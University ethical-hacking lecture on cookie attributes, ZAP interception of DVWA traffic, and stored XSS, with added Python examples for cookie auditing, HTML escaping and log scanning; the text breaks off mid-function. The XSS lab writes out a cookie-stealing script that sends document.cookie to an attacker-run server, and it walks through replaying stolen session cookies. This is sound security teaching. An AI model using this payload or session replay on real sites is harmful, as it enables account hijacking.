Lecture11 Cookie ZAP XSS

This lecture covers the fundamentals of cookies, the OWASP Zed Attack Proxy (ZAP), and Cross-Site Scripting (XSS) attacks. It explains how cookies function, their attributes, and how ZAP can be used as an intercepting proxy to observe and manipulate HTTP messages. The session includes practical examples of using ZAP to intercept and analyze web traffic, specifically focusing on cookie management and XSS vulnerabilities.

INFO3002 Ethical Hacking Principles and Practice

Lecture 11: Cookie, ZAP and XSS attacks

School of Computer, Data and Mathematical Sciences


Western Sydney University
1
Lecture outline
We first look at the basics of cookies, then a tool called ZAP
that lets us observe and hijack cookies, and finally the details
of XSS attacks, which often steal cookies from victims' browsers.

■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

2
What's a Cookie
■ A cookie is a string that a website sends to a user's
browser, which will store it and send it back together with
the next request to this website.
■ In many cases, you can view a cookie as a user's unique
ID card: it lets the website recognise that this user has
returned.

Reference:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies

3
Typical usage of cookies
■ Session management (user logins, shopping carts)
■ Personalization (user preferences)
■ Tracking (analyzing user behavior)

Since cookies are carried by HTTP messages, we will first have
a quick review of the format of HTTP messages in the next
several slides, before we talk about the details of how to set
and send cookies.

4
Review: the format of HTTP messages
■ Both Request and Response messages share the same
format:
▬ Start line
o contains command for Request, and status for Response
▬ headers
o each header uses one line
▬ an empty line
o used to indicate the start of the body
▬ body

5
An example of HTTP Request messages

GET /index.php?ID=1234&age=24 HTTP/1.1

/* empty */

6
NB: Query String in HTTP Request
■ In GET, user input can be appended to the end of URL,
starting with a ‘?’. This is called a query string.
▬ E.g.: http://www.test.com/index?ID=1234&name=John+Smith&age=24

■ In a query string:
▬ A name=value pair is used and different pairs are separated by the
ampersand '&'.
o "name" refers to the "name" attribute of an HTML input element.
▬ Spaces are replaced with the '+' character, and any other non-alphanumeric
character is percent-encoded, i.e. replaced with '%' followed by its
hexadecimal value (e.g. '%20').

7
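To make the message format and the query-string encoding concrete, here is an added example (not code from the slides) that splits a raw request into its start line, headers and body, decodes the query string and parses the 'Cookie' header. The sample request is constructed for this example; the 'name=John+Smith' parameter mirrors the slide's URL.

```python
import urllib.parse

# Constructed sample request (not taken from the slides); CRLF line endings as sent on the wire.
RAW_REQUEST = (
    "GET /index?ID=1234&name=John+Smith&age=24 HTTP/1.1\r\n"
    "Host: www.test.com\r\n"
    "Cookie: yummy_cookie=choco; tasty_cookie=strawberry\r\n"
    "\r\n"
)


def parse_http_message(raw):
    """Split a raw HTTP message into (start_line, headers, body).

    Works for both requests and responses: the start line comes first,
    one header per line, and the first empty line marks the start of the
    body. Header names are case-insensitive, so they are lower-cased as keys.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    start_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start_line, headers, body


def parse_request_target(start_line):
    """Split 'GET /index?ID=1234 HTTP/1.1' into method, path and decoded query parameters.

    parse_qs undoes the form encoding: '+' becomes a space and %XX escapes
    are decoded; repeated names are collected into a list.
    """
    method, target, _version = start_line.split(" ")
    path, _, query = target.partition("?")
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    return method, path, params


def parse_cookie_header(value):
    """Turn 'a=1; b=2' (the Cookie request header) into a dict."""
    cookies = {}
    for pair in value.split(";"):
        pair = pair.strip()
        if not pair:
            continue
        name, _, val = pair.partition("=")
        cookies[name.strip()] = val.strip()
    return cookies


if __name__ == "__main__":
    start, hdrs, body = parse_http_message(RAW_REQUEST)
    print(parse_request_target(start))
    print(parse_cookie_header(hdrs["cookie"]))
    print("body is empty:", body == "")
```

The same `parse_http_message` function works on a response, where the start line is the status line and the body carries the HTML page.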
An example of HTTP Response messages

8
Set Cookies
■ A server sets or updates a cookie at a user's browser by using
the 'Set-Cookie' header in the HTTP Response message.
■ The syntax is:
▬ Set-Cookie: <name>=<value> [; attributes (optional)]

■ For example:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry

[followed by an html page]

9
Send Cookies back
■ A browser sends a cookie back to a server by using the
'Cookie' header in the HTTP Request message.
■ The syntax is:
▬ Cookie: <name>=<value> [; more cookies for this site]

■ For example:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

10
Cookie Attributes
■ A cookie can have the following attributes:
▬ Expires (or Max-Age)
▬ Secure
▬ HttpOnly
▬ Domain
▬ Path

■ All of them are very important!

11
Attribute – Expires or Max-Age
■ If a cookie does not have the 'Expires' or 'Max-Age' attribute,
it is a session cookie.
▬ A browser will not save it when the browser is closed.
▬ The server will remove the session it identifies after a certain period of inactivity.
▬ A session cookie is typically used in a login process to identify a user.

■ Otherwise, it is a persistent cookie, which will be saved on disk
until it expires at the time specified by the 'Expires' or 'Max-Age'
attribute.
▬ A persistent cookie is typically used to identify a user over a long term.
▬ Syntax for setting a persistent cookie:
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2023 07:28:00 GMT;

12
Attribute – Secure
■ A cookie with the 'Secure' attribute will only be sent to the
server when a request is made using the HTTPS protocol.
■ In sensitive cases (e.g., logging in), cookies should have the
'Secure' attribute set, and transferred using the HTTPS.
■ However, web developers sometimes forget this, which gives rise
to broken authentication, the No. 2 web vulnerability.
■ Syntax for setting the 'Secure' attribute:
Set-Cookie: id=a3fWa; Secure;

13
Attribute – HttpOnly
■ The 'HttpOnly' attribute indicates that a cookie can only be
exposed in HTTP messages.
▬ This means that the cookie cannot be accessed by any client-side code
such as JavaScript (it will not appear in document.cookie).
▬ As will be seen later in this lecture, a typical consequence of XSS attacks
is that cookies are stolen by malicious JavaScript code.

■ So setting the 'HttpOnly' attribute is the key to preventing
cookies from being stolen by XSS attacks. Note that it only stops
injected script from reading the cookie; the browser still attaches
the cookie to requests that such a script triggers, so HttpOnly
limits the damage but does not fix the XSS flaw itself.
■ Syntax for setting the 'HttpOnly' attribute:
Set-Cookie: id=a3fWa; Secure; HttpOnly;

14
Attributes – Domain and Path
■ The Domain and Path attributes define the scope of a cookie,
i.e., the set of URLs with which the cookie should be sent
back.
■ Domain specifies the host or domain to which the cookie will
be sent.
■ If not specified, it defaults to the host of the website that sets
this cookie. No other hosts will be included.
■ However, if a domain is specified, hosts in this domain and its
subdomains are always included.
▬ E.g., if Domain=mozilla.org is set, cookies are included on subdomains
like developer.mozilla.org.

15
Attributes – Domain and Path (cntd)
■ Path specifies the path that must exist in the URL when
sending the cookie back.
▬ Note that subdirectories of Path will be matched as well.

■ E.g., if Path=/docs is set, the paths below will all be
matched:
▬ /docs
▬ /docs/Web/
▬ /docs/Web/FTP/somehow.html

■ If Path is not specified, it defaults to the directory part of the
URL that sets this cookie.

16
Attributes – Domain and Path (cntd)
■ Syntax for setting the 'Domain' and 'Path' attributes:
Set-Cookie: id=a3Wa; Domain=domain-name; Path=directory-path

Examples:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAKabEaem_vYg; Path=/accounts;
Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVncdDKrdst; Domain=foo.com; Path=/;
Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly

References: HTTP State Management Mechanism,
https://tools.ietf.org/html/rfc6265#section-4.1.2.3

17
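The following added example (not from the slides) ties the attribute slides together: it parses a 'Set-Cookie' header, audits it for the missing 'Secure' and 'HttpOnly' attributes the lecture warns about, and implements the RFC 6265 domain-match and path-match rules so you can check which requests a browser would attach the cookie to. The two sample headers are the ones on the slide above; the assumption that a missing Path defaults to '/' is a simplification of this example (the real default is the directory of the setting URL).

```python
# Sample headers taken from the slide above.
LSID_HEADER = ("LSID=DQAAAKabEaem_vYg; Path=/accounts; "
               "Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly")
HSID_HEADER = ("HSID=AYQEVncdDKrdst; Domain=foo.com; Path=/; "
               "Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly")


def parse_set_cookie(header_value):
    """Parse one Set-Cookie value into (name, value, attributes).

    Attribute names are case-insensitive and are lower-cased; flag attributes
    such as Secure and HttpOnly map to True. The Expires value contains a
    comma but never a semicolon, so splitting on ';' is safe.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return a list of findings for one Set-Cookie header (empty = nothing to flag)."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure, cookie will also be sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly, readable via document.cookie by injected script")
    if "expires" not in attrs and "max-age" not in attrs:
        findings.append(f"{name}: session cookie (no Expires/Max-Age), discarded when the browser closes")
    if isinstance(attrs.get("domain"), str):
        findings.append(f"{name}: Domain={attrs['domain']} also sends the cookie to every subdomain")
    return findings


def domain_matches(cookie_domain, request_host):
    """RFC 6265 domain-match: the host equals the Domain value or is a subdomain of it."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    request_host = request_host.lower()
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


def path_matches(cookie_path, request_path):
    """RFC 6265 path-match: exact match, or the cookie path is a directory prefix."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        if cookie_path.endswith("/"):
            return True
        if request_path[len(cookie_path)] == "/":
            return True
    return False


def would_be_sent(header_value, set_by_host, request_host, request_path, https):
    """Decide whether a browser would attach this cookie to a given request.

    Without a Domain attribute the cookie is host-only (exact host match).
    Without a Path attribute this example assumes '/' for simplicity.
    A Secure cookie is only sent over HTTPS.
    """
    _, _, attrs = parse_set_cookie(header_value)
    domain = attrs.get("domain")
    if isinstance(domain, str):
        host_ok = domain_matches(domain, request_host)
    else:
        host_ok = request_host.lower() == set_by_host.lower()
    path = attrs.get("path")
    if not isinstance(path, str):
        path = "/"  # assumption of this example, see docstring
    path_ok = path_matches(path, request_path)
    secure_ok = https or "secure" not in attrs
    return host_ok and path_ok and secure_ok


if __name__ == "__main__":
    for header in (LSID_HEADER, HSID_HEADER):
        print(header.split(";")[0], "->", audit_set_cookie(header) or "OK")
    print(path_matches("/docs", "/docs/Web/FTP/somehow.html"))
    print(domain_matches("mozilla.org", "developer.mozilla.org"))
```

Running the audit over the slide's two headers flags only HSID: it lacks 'Secure' and its Domain attribute widens the scope to all of foo.com's subdomains.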
Lecture outline
■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

18
ZAP overview
■ The OWASP Zed Attack Proxy (ZAP) is an open-source
comprehensive web pentesting tool.
■ ZAP mainly has the following functions:
▬ Intercepting web proxy
▬ Web crawler
▬ Vuln scanner
▬ Fuzzer

■ Another tool similar to ZAP is Burp Suite, which is a
commercial tool. Preferring open source tools, we will use
ZAP in this subject.

19
ZAP overview (cntd)

■ ZAP is written in Java, so it needs a JRE to run.
■ Because it is implemented in Java, ZAP is cross-platform.
■ The official ZAP User Guide is available in two forms:
▬ as context-sensitive help within ZAP
▬ online at https://www.zaproxy.org/getting-started/

20
ZAP Installation

■ ZAP may or may not be installed in Kali Linux by default,
depending on the Kali version.
■ If ZAP is not installed on your Kali, simply perform the
following two steps to install it.
▬ $ sudo apt update
▬ $ sudo apt install zaproxy
NB: On the Kali VMs hosted in the school cloud, ZAP is installed, so you
don't need to run the two steps above.

21
ZAP – An intercepting web proxy
■ Web proxy: used to send/receive HTTP messages to/from
servers on behalf of browsers.

[Diagram: Browser <-> (HTTP Requests / HTTP Responses) <-> ZAP Proxy <-> (HTTP Requests / HTTP Responses) <-> Web Server]

■ Intercepting proxy: further allows you to stop, observe and
modify the HTTP messages before forwarding them.
■ In this subject, we'll only focus on the intercepting feature of
ZAP.
▬ Other features of ZAP are also very powerful, but we'll leave them for
your own exploration.
22
ZAP – Starting
■ In the Kali desktop, click the Kali Applications Start button on
the top-left corner -> 'Web Application Analysis' -> 'ZAP'

23
ZAP – Starting (cntd)
■ When asked 'Do you want to persist the ZAP session?', you should
use the default 'No', and click 'Start'.
▬ 'persist' means 'save' in the parlance of ZAP. Usually, you do not need to
save a ZAP session.

24
ZAP – Starting (cntd)
■ If you are asked to manage Add-ons, you can close that window
straight away, not doing anything.

25
ZAP – Starting (cntd)
■ If you are asked to update it to a newer version, you should
NOT do that. Otherwise, the system interface may be
different from what we teach in the slides.

26
ZAP – Starting (cntd)
■ Then, you will see the GUI of ZAP. In this unit,
▬ you will not be asked to use the 'Quick Start' tab, which is mainly for web
vuln scanning.
▬ instead, you will be asked to click the 'Request' and 'Response' tabs to
examine the HTTP Request and Response messages.

27
ZAP – The port number 8081
■ By default, ZAP will listen on port 8081 to relay messages for
browsers.
■ To verify this, you can do 'sudo ss -lntp' on Kali.
▬ '-lntp' will show listening TCP ports in numeric format and also their
associated processes.
▬ '-antp' is also OK, but it will list all TCP ports.

28
Configure Firefox to use ZAP as proxy
■ In order for ZAP to intercept messages, we need to point
Firefox at ZAP first.
■ Start Firefox. Then, click the 'settings' button on the top right:
■ Preferences -> Network Settings (at the bottom)

29
Configure Firefox to use ZAP as proxy (cntd)
■ Firefox automatically contacts some hosts in firefox.com,
Mozilla.org, and digicert.com to get updates, etc.
■ You need to add these domains to exceptions, so the traffic to
these domains will not go through the ZAP proxy and hence
will not disturb your observations.

30
ZAP – Toolbar icons 1-5 for
intercepting messages

[Toolbar icons 1 to 5]
1. When its color is green, no interception will happen, i.e., ZAP
will pass on all messages. To start interception, you need to
click this icon to change its color to red. Then, ZAP will
withhold all messages unless you click icon 2 or 3 to release
them.
2. Release the current withheld Request or Response
message.

31
ZAP – Toolbar icons for intercepting
messages (cntd)


3. Release all current and future Request/Response messages
until a breakpoint is reached.
o A breakpoint can be created by clicking icon 5.

4. Discard the current withheld message.

32
ZAP – Toolbar icons for intercepting
messages (cntd)


5. Create a breakpoint by using certain string matching criteria.
Note: How to create breakpoints is not required in this unit.

33
Example 1: Using ZAP to intercept and
observe HTTP messages
a) In ZAP, click icon 1 to start interception.
b) In Firefox, enter the following URL:
http://<IP of Metasploitable2>/dvwa/
• Don't use 'https' here, which will make the messages hard to observe. It
may automatically switch to ‘https’ later, which is fine.
• The URL should include a slash ‘/’ in the end, otherwise you’ll observe
more messages for redirections.

Then, you'll see a warning about the OWASP Zed Attack Proxy
Root CA. Here you should click "Advanced", and then at the
bottom click "Accept the Risk and Continue".
See the screenshots in the ensuing slides.

34
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
c) Proceed to the site anyway:

35
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)

After clicking this one, Firefox will stop there.

To proceed, you need to switch to ZAP to release the
intercepted HTTP messages. Follow the ensuing slides.

36
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
d) In ZAP, you will see the first HTTP GET message from Firefox is
intercepted, and displayed in a new tab 'Break'. Then, you should click
icon 2 to forward this message to the web server.

[Screenshot: the header part consists of many lines, with the first line
containing the URL requested; the body part is empty]

37
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
e) Then, you will see the HTTP Response message containing two cookies
is intercepted, and displayed in the tab 'Break'. Continue to forward this
message by clicking icon 2.

[Screenshot: the response sets a cookie named 'PHPSESSID' and a second
cookie named 'security']

Since you haven't been authenticated yet, the web server will redirect you to the
page 'login.php'. The 'Location:' header is used for redirection.
38
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
f) The HTTP GET message for 'login.php' is intercepted. Note that this
message contains the two cookies received from the server before.
Continue to forward this message by clicking icon 2.

[Screenshot: the 'Cookie:' header contains two cookies]
39
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
g) The HTTP Response message for 'login.php' is intercepted. Besides the
headers, this message also has a body part which contains the HTML
code of the login page. Continue to forward this message by clicking icon 2.

[Screenshot: the HTML page generated by 'login.php']
40
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
h) If this is the first time you use Firefox to visit DVWA, you'll observe the
request and response messages for the CSS file and JavaScript files. Release
all of them (icon 2 for each, or icon 3 to release them all). Then, in Firefox,
the login page will be displayed. Enter the username and password, and then
click 'Login'.
▬ Username: admin
▬ Password: password

41
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
i) The HTTP POST message with username and password is intercepted. Note
that this message contains the two cookies received before, and the
username and password in the body part. Continue to forward this message
by clicking icon 2.

[Screenshot: username and password carried in the body of the POST message]
42
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
j) The HTTP Response message for the username and password is
intercepted. It redirects the browser to the 'index.php' page after
successful login. Continue to forward this message by clicking icon 2.

[Screenshot: redirect to 'index.php' using the 'Location:' header]
43
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
k) The HTTP GET message for 'index.php' is intercepted. Note that it still
carries those two cookies. Continue to forward this message by clicking icon 2.

44
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
l) The HTTP Response message for 'index.php' is intercepted. Its body part
contains the HTML page generated by 'index.php'. Continue to forward
this message by clicking icon 2. If you observe the request and response
messages for the CSS file and JavaScript files, continue to forward them as
well.

45
Example 1: Using ZAP to intercept and
observe HTTP messages (cntd)
m) In Firefox, the DVWA page generated by 'index.php' is displayed.

46
Notes to Example 1
■ All the previous Request/Response pairs passing through
ZAP can be reviewed by clicking the 'History' tab. You can
highlight a message pair, and then look at their details by
clicking the 'Request' or 'Response' tab above.

■ You must be patient enough to understand the whole
process, which contains many request/response exchanges.

47
Example 2: Using ZAP to modify
HTTP messages
a) Continue from the previous example. In Firefox, set the DVWA
security level to 'low'. During this process, you need to pass
every message in ZAP by clicking icon 2. After the security level
is successfully changed, the 'History' tab should show about
three or four pairs of messages for 'security.php'.

48
Example 2: Using ZAP to modify
HTTP messages (cntd)
b) Highlight the last pair of messages from 'History' and examine
its GET message by clicking the 'Request' tab. Then, copy
and paste the entire 'Cookie:' header in this message to a text
editor, say, 'mousepad'.

[Screenshot: copy and paste this entire 'Cookie:' line to a text editor]
49
Example 2: Using ZAP to modify
HTTP messages (cntd)
c) Close Firefox, so that Firefox removes both cookies from its memory:
'security' and 'PHPSESSID', since these two are session cookies.

d) Start Firefox and visit http://<IP of Metasploitable2>/dvwa/ again.
NB: The trailing '/' in the URL above must be included.

e) In ZAP, you will notice that the GET message for this does not have those
two cookies, looking exactly the same as the first GET message
intercepted in Example 1.

50
Example 2: Using ZAP to modify
HTTP messages (cntd)
f) Click the window containing the GET message, and you'll see that you
can edit the message.

g) Copy and paste the 'Cookie:' header saved in mousepad into this
message.

[Screenshot: insert the 'Cookie:' header here, among the request headers]
51
Notes to the previous Step (g)
■ If you continue without this step, you will have to log into
DVWA using 'admin' again, and change the security level to
'low' by yourself again.
■ This step is used to simulate the scenario below:
▬ Cookies are stolen and used by a hacker in another browser while the
true user is still considered active at the web server.
▬ Note: A web server typically times out a session after 20 minutes of
inactivity.

■ As you'll see next, after you forward this message with the
inserted cookies to the web server, you'll be returned the DVWA
interface with the security level being 'low' without going
through the login page.

52
Example 2: Using ZAP to modify
HTTP messages (cntd)
h) Forward the modified GET message by clicking icon 2.

i) Forward the ensuing Response message by clicking icon 2 as well.

j) In Firefox, you'll see the DVWA interface with the security level being 'low'.

[Screenshot: note the 'Security Level: low' at the bottom]
53
Notes to Example 2
■ Any part of an HTTP message can be modified in ZAP before
forwarding the message.
■ Besides ZAP, modern browser add-ons also allow you to
add and modify cookies. You can use them to manipulate
cookies as well.
▬ Firefox: Cookie Manager+
▬ Chrome: Cookie Inspector

■ To prevent interception and eavesdropping, HTTPS must be
used if the cookies involved are sensitive.
▬ HTTPS can prevent Man-In-The-Middle attacks in most cases.
▬ In practice, you see no sensitive website using plain HTTP today.
54
Lecture outline
■ Cookie
■ OWASP Zed Attack Proxy (ZAP)
■ Cross-Site Scripting (XSS) attacks

55
Prologue to XSS attacks
■ In the previous example, the cookies were stolen by
interception, which is not very realistic in practice.
■ Another way is by eavesdropping of course, but this can be
easily defeated by using HTTPS as well.
■ An effective way is by XSS attacks, which we will talk about
next.

56
XSS Overview
■ In XSS attacks, attackers use flawed web applications to
send malicious client-side code to browsers.
■ XSS attacks can occur when a web application does not
sanitize the users' inputs that it uses to generate output for
browsers.
▬ Attackers can include malicious client-side code in such inputs.
▬ XSS attacks are also a kind of injection attack.

57
XSS Types
■ There are mainly three types of XSS attacks:
▬ Persistent (Stored)
▬ Non-persistent (Reflected)
▬ DOM-based

■ The first two are the most important, and will be covered in
our lectures. You are encouraged to explore the last one
yourself if interested.

Reference:
https://en.wikipedia.org/wiki/Cross-site_scripting

58
Persistent (Stored) XSS

■ Occurs when a hacker's malicious inputs are saved into the web
application's database without sanitization, and then
displayed on web pages.
▬ Example: Enter malicious JS code into a web page that allows users to
leave and view comments. When other users view the web page
containing these comments, they will be attacked.
▬ Characteristic: The malicious JS code is saved in the database.

59
Non-Persistent (Reflected) XSS

■ Occurs when malicious input contained in the URL query
string is echoed back from the web server to the browser for
displaying a web page, with the input not sanitized.
▬ Example: Compose and distribute a URL with a query string containing
malicious JS code. When a user clicks this URL, the query string will be
processed by the web server. In most cases, the data contained in the
query string will be sent from the web server to the user's browser for
displaying a dynamic web page. Thus, the malicious JS code contained
in the query string gets the chance to be executed by the browser.
▬ Characteristic: The malicious JS code is injected into the URL only, and
will not be saved in the database.

60
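As an added example (not code from the slides or from DVWA), the following Python models both XSS types from the two preceding slides on a tiny guestbook: the vulnerable renderer concatenates stored messages and the echoed 'q' query parameter straight into HTML, while the hardened renderer applies output encoding with `html.escape`, which is the fix the lecture's "not sanitized" wording points at. The guestbook entries are constructed; the second one carries the alert(document.cookie) payload used in Example 2 later in the lecture. The function names are this example's own.

```python
import html
from urllib.parse import parse_qs

# Constructed guestbook entries standing in for DVWA's database (not from the slides).
# The second visitor "signed" with a script tag in the Message field.
ENTRIES = [
    ("alice", "Nice site!"),
    ("mallory", "<script>alert(document.cookie)</script>"),
]


def render_guestbook_vulnerable(entries):
    """Stored XSS: user input from the database is concatenated into the page unchanged,
    so a <script> in any message runs in every visitor's browser."""
    rows = "".join(f"<div>Name: {name}<br />Message: {msg}</div>\n" for name, msg in entries)
    return f"<html><body>\n{rows}</body></html>"


def render_guestbook_hardened(entries):
    """Output encoding: html.escape turns < > & \" ' into entities, so the browser
    shows the text of the payload instead of executing it."""
    rows = "".join(
        f"<div>Name: {html.escape(name)}<br />Message: {html.escape(msg)}</div>\n"
        for name, msg in entries
    )
    return f"<html><body>\n{rows}</body></html>"


def _search_term(query_string):
    """Extract and percent-decode the 'q' parameter from a raw query string."""
    return parse_qs(query_string, keep_blank_values=True).get("q", [""])[0]


def render_search_vulnerable(query_string):
    """Reflected XSS: the 'q' parameter from the URL is echoed straight back."""
    return f"<p>You searched for: {_search_term(query_string)}</p>"


def render_search_hardened(query_string):
    """Same page with the echoed parameter HTML-encoded."""
    return f"<p>You searched for: {html.escape(_search_term(query_string))}</p>"


def contains_live_script(page):
    """Crude check for the demo: does the rendered HTML still contain a raw <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_guestbook_vulnerable(ENTRIES))
    print(render_guestbook_hardened(ENTRIES))
    crafted = "q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"  # constructed reflected payload
    print(render_search_vulnerable(crafted))
    print(render_search_hardened(crafted))
```

Encoding must match the output context: `html.escape` is right for text between tags and for quoted attribute values, but data placed inside a `<script>` block or a URL needs its own encoding, which is why frameworks template output rather than concatenate strings.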
XSS Consequences
■ Although browsers only allow JS to do limited things, the
consequence of XSS attacks can still be very serious.
■ Both types of XSS attacks can do harm in the following
ways:
▬ Modify web pages
▬ Redirect users to malicious web pages
▬ Steal cookies and hence steal the HTTP session (the focus in this
lecture)
▬ Access users' webcam, geolocation, etc.
▬ And more …

61
Stored XSS examples
■ We will next give several examples of Stored XSS attacks
using the DVWA page that contains an XSS vulnerability.
▬ Among them, we'll show how to steal cookies from a browser.

■ We will detail Reflected XSS in our next lecture.

62
Set Firefox to use 'No Proxy'
■ Before we demo the examples, we need to revert the proxy
settings in Firefox to 'No proxy', because we are not going to
use ZAP, but XSS to get Cookies.

■ Then, in Firefox, we enter the URL of the DVWA website.

63
Ensure to change Security Level to 'Low'
■ After logging in, click 'DVWA Security', and then change the
level to 'Low', and then click 'Submit'.

64
Visit the Stored XSS page in DVWA

Click 'XSS stored' and you'll arrive at this page.

[Screenshot: the previous messages left by visitors are listed here]

65
Allow more characters in the 'Message' field
to accommodate long JS code

Use the mouse to activate the 'Message' field, then right click.
Then, click 'Inspect Element'.

66
Allow more characters in the 'Message' field
to accommodate long JS code (cntd)

Double click the 'maxlength' attribute. Change the value of
'maxlength' from 50 to a larger one, say, 200. Then, close the
Inspector window.

NB: this can also be achieved by enabling the interception
in ZAP and modifying the HTML page from there.
67
Example 1: Generate alert box
■ Enter crafted inputs for the 'Name' and 'Message' fields as
shown below, and then click 'Sign Guestbook'.

[Screenshot: the 'Message' field holds JS code that pops up an alert box,
an example of malicious JS code]
68
Example 1: Generate alert box (cntd)
■ Then, an alert box is popped up. Note that in the Messages list,
the code inside the <script> tag won't be displayed by browsers.

[Screenshot: the JS code won't be displayed, so users won't know about it
if the JS code does things quietly!]
69
Example 1: Generate alert box (cntd)
■ Now let's try visiting this page using another computer.
■ Use the IE at Win7 VM to visit the DVWA site.
▬ Set the security level to 'low'.
▬ Visit the 'XSS Stored' page.
▬ IE will download the guest messages and hence execute the JS code, and
get attacked too!

70
Reset the database
■ Before demonstrating the next example, we'd like to remove the
previous crafted message from the database, so that it won't appear
and disturb our future demos.

■ To achieve this, we can use the 'Setup' page in the DVWA website.

[Screenshot: click the button on the Setup page to restore the database to
its original state. Only one click will do the job for you.]
71
71
Example 2: Retrieve Cookies in JS
■ We can use the JS object document.cookie to retrieve all cookies
associated with the current HTML document.
■ To demo this, visit the 'XSS stored' page in DVWA again (remember
to enlarge the 'maxlength' attribute for the 'Message' field as well),
and then enter the inputs for the 'Name' and 'Message' fields as
shown below.

72
Example 2: Retrieve Cookies (cntd)
■ We'll see the cookies are returned in the alert box.

73
Example 2: Retrieve Cookies (cntd)
■ Similar to Example 1, if you visit the 'XSS Stored' page via the
IE at the Win7 VM, IE will download the guest messages and
hence execute the JS code, and get attacked too!
▬ You need to set the security level to 'low' before visiting this 'XSS Stored'
page.

74
Example 3: Steal Cookies
■ In Example 2, the cookies are displayed in a victim’s own
browser, so the attack is harmless.
■ In this example, we'll show how to send the retrieved cookies
to a remote attacker machine.
■ This can be achieved by
▬ At the attacker machine, set up a web server to receive HTTP requests
that contain stolen cookies.
▬ In the crafted JS code, leverage the <img> tag's src attribute to include
the HTTP requests that can send stolen cookies to the web server set up
by the attacker.

75
Example 3: Steal Cookies (cntd)
■ In a Kali terminal, set up a simple web server using the
http.server module of Python3.
▬ The '-m' option is used to specify the module name.
▬ The http.server module will display the URLs received and try to serve
those URLs.
o To be seen in the next slide, the JS code will include the stolen cookies in the
URL of an image.

76
Example 3: Steal Cookies (cntd)
■ In Firefox at Kali, visit the DVWA site, change Security Level to
'low', and browse the 'XSS Stored' page.
■ Enter the inputs as shown below and submit.
NB: the code inside the <script> tag is:
new Image().src="http://192.168.153.132/a.gif?" + document.cookie

[Screenshot annotations: this gif does not need to exist. 192.168.153.132 is
the IP address of the simple web server; you should replace it with the IP of
your Kali VM.]
77
Example 3: Steal Cookies (cntd)
■ In the terminal of http.server, we will see the following displayed.

[Screenshot: the http.server log line for the GET request whose query string
carries the stolen cookies. The '%20' is a space character.]

■ So the cookies are successfully stolen.

■ A hacker can then start his/her own browser and insert these two
cookies to obtain a logged-in session.

78
Example 3: Steal Cookies (cntd)
■ Since the message containing the JS to steal cookies is stored in
the database of DVWA, every user visiting the 'XSS Stored' page of
DVWA will download this message and run the JS code. Therefore,
their cookies will be reported to the http.server as well.

■ Let's prove this by using the IE in Win7 to visit this page. We'll do:
▬ Log into the DVWA website using IE.
▬ Change the Security Level to 'low'.
▬ Browse the 'XSS Stored' page.

■ Then in the terminal of the http.server, we'll see another set of
cookies:

79
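The log lines that http.server prints in Example 3 are also exactly what a defender looks for in any web server access log: a request whose query string contains session-cookie pairs is a sign that document.cookie is being exfiltrated. The following added example (not from the slides) parses constructed log lines in the format written by python3 -m http.server, percent-decodes the query string and flags the lines that leak a session cookie name. The IP addresses, timestamps and session values are all constructed, and the watchlist of cookie names is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed log lines in the format printed by python3 -m http.server
# (client - - [date time] "request line" status size). Not copied from the slides.
SAMPLE_LOG = """\
192.168.153.134 - - [10/Oct/2023 10:21:05] "GET /a.gif?security=low;%20PHPSESSID=0123456789abcdef HTTP/1.1" 404 -
192.168.153.134 - - [10/Oct/2023 10:21:07] "GET /favicon.ico HTTP/1.1" 404 -
192.168.153.140 - - [10/Oct/2023 10:25:41] "GET /a.gif?security=low;%20PHPSESSID=fedcba9876543210 HTTP/1.1" 404 -
192.168.153.140 - - [10/Oct/2023 10:25:42] "GET /index.html?page=2 HTTP/1.1" 200 -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<version>\S+)" (?P<status>\d{3})'
)

# Assumed watchlist of session-cookie names worth alerting on.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "sessionid"}


def cookie_pairs_in_query(target):
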